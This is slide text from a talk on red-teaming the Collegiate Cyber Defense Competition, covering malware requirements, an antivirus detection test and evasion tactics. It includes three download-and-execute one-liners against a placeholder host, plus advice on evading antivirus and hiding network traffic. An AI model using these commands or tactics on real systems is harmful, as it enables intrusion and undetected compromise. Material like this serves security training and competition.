Upload
scriptjunkie
View
1.866
Download
0
Tags:
Embed Size (px)
DESCRIPTION
Citation preview
Red Teaming the CCDChacking the most paranoid student system administrators in the nation
Matt “scriptjunkie” Weeks
Some funny thingsOur mistakes and yours
No, don’t start “aCcbsXoAIfRsU”
Those other people logged-in are not
your friends.
You planned to get hacked?
A year of curating red team wallpaper
Gotta keep up with changing memes
The red team has you
Screenshot inception!
Personal Favorite
https://www.youtube.com/watch?v=TrnUO6TLrtE
The malware gamesChallenges writing malware
Requirements
Full-featured RAT
File access
Interactive shell
Screenshots, keylogger
May include stealth features
Basic backdoors
Used for re-establishing full-featured RAT
Simple command and/or shellcode execution
Callback or listening
Keylogger/persistent monitoring
File packing tools
Worms – every method possible
Compatibility is hard
Windows XP – Win 8.1
Hook-based keylogging fails…
*NIX’s
Make Windows look great
No two Linux distros startup the same
OS X(!)
NetBSD
OpenBSD
FreeBSD
X64/x86
OpenIndiana (Solaris)
Ubuntu
Fedora
Linux Mint
But hard work pays off, kids
On-the-fly backdoors
Usually you are caught off-guard with at least one system
Webshell collections are your friend
Scripting skills are a must
while[ true ] ; do wget -O - http://a.bc/def | sh ; sleep 10 ; done
eval(urllib2.urlopen('http://a.bc/def').read())
echo Set x=CreateObject("Microsoft.XMLHTTP"):x.Open
"GET","http://a.bc/def",False:x.Send:Execute x.responseText >>v.vbs&start v.vbs
First world red team problems:
I accidentally six or seven keylogger copies
On Antivirus
-or-
why does
everybody
use MBAM?
Process
Write malware
Does AV detect?
YesLook for
shady code
Obfuscate functions,
stringsDone!
No
But usually
Write malware
Does AV detect?
Done!
No
AV test lab
Top market share AV’s (Internet Security Suite version) on default settings
7 “fresh” tests (results BEFORE I knew what any of the AV’s would detect)
Why not VirusTotal?
Test 1: Widely known malware
with 1 byte appended
The only way to fail is by using giant hash lists instead of real signatures
FAIL
WIN
FAIL
WINFAIL
FAILFAILFAIL
WIN WIN WIN
WIN
Test 2: Malware with public code
samples
FAIL FAIL
FAIL
FAILFAILFAIL
FAIL FAIL FAIL FAIL FAIL
FAIL
Test 3: One-off malware with no
evasions
FAIL FAIL
FAIL
FAIL
FAIL FAIL INDECISIVE
FAIL
WINWIN
WININDECISIVE
Test 4: “Chris’s Ex-Girlfriend” – Highly
evasive malware workhorse
FAIL FAIL
FAIL
FAILFAILFAIL
FAIL FAIL FAIL FAIL FAIL
FAIL
Test 5: “The Kraken” – Sneaky firewall-
evading malware
FAIL FAIL
FAIL
FAILFAILFAIL
FAIL FAIL FAIL FAIL
FAIL
WIN
Test 6: Worm with no evasions
FAIL FAIL
FAIL FAIL FAIL
FAIL
WIN WINFAIL
Hosed VMFAILFAIL
Test 7: Legit program used maliciously
FAIL FAIL
FAIL
FAILFAIL
FAIL FAIL FAIL FAIL FAIL
FAILINDECISIVE
Notes
Symantec was only AV to detect reverse meterpreter on the wire
Kaspersky’s behavioral emulation detected one worm well
Kaspersky and Comodo both recognized at least one piece of malware as
unusual, (not on whitelist) but not necessarily bad
Trend Micro was only AV to block hash dumping
Panda, Avast gave errors installing and were not tested
Final standings
100% FAIL
meh
100% FAIL
TIED 1st100% FAIL
100% FAILFAILFAIL
meh TIED 1st 3rd
meh
Just kidding. After 2 hours obfuscating,
these are the real final standings:
FAIL FAIL
FAIL
FAILFAILFAIL
FAIL FAIL FAIL FAIL FAIL
FAIL
How do I bypass AV?
Write your own stuff
Dynamically resolve API calls
Obfuscate strings
Introduce environmental/system dependencies to generically thwart sandboxing
Write your own stuff
Impersonate legitimate software
Watch what hits disk
Digitally sign your stuff if you can
Write your own stuff
Security Software Lessons
Some AV’s are a total fail
MalwareBytes Pro is in this list with MS, McAfee, F-Secure
Many have one really cool feature or heuristic
Kaspersky, Symantec, Trend Micro
All can be bypassed easily for most malware
Only detection remaining after 2 hours was one worm vs Kaspersky
Hiding from the students
Hiding from the students
Host hiding
Hide while running
Hide start
Meterpreter is great for functionality, bad for persistence
Mostly custom malware
Mostly standard persistence methods
Don’t run in your own process
Don’t use any of those toy languages with dependencies
Use C!
Don’t hide stuff rootkit finders look for
Don’t sweat the one-offs
Hiding on the wires
Hiding from Wireshark
Harder than hiding on host
Try to blend in with normal traffic
Throw Wireshark crashers
Remove packets from view
Hiding from netstat/tcpview
Using HTTP(S) instead of TCP callbacks doesn’t leave connection open
If that fails, blend in by using common ports and cloud IP’s
Migrate session to web browser or critical process
Hiding on the wires
Use every protocol that gets out
TCP
UDP
HTTPS
DNS
Use hop points in cloud/web hosting
Use file sharing/paste/social media sites
Random callback selection and delays to avoid monitors
Any way students can send or receive info, you can too
Dealing with firewalls
Two types
Host
Network
Host firewalls
Usually don’t stop outbound traffic
Can go underneath, watch raw packets
Frequently add exceptions or drop the firewall
Network firewalls
Great to own
Tough if you don’t
Use service ports since
they must be able to
reach the hosts
Defenses that hurt
Patch or block RCE’s
Strict inbound and outbound network firewall rules
Traffic monitoring
Different passwords on all the boxes
Pull the plug
Reverting (sometimes)
Realizing that sometimes, the red team can’t hurt you as much as finishing
injects helps you
Questions
@scriptjunkie1
https://scriptjunkie.us/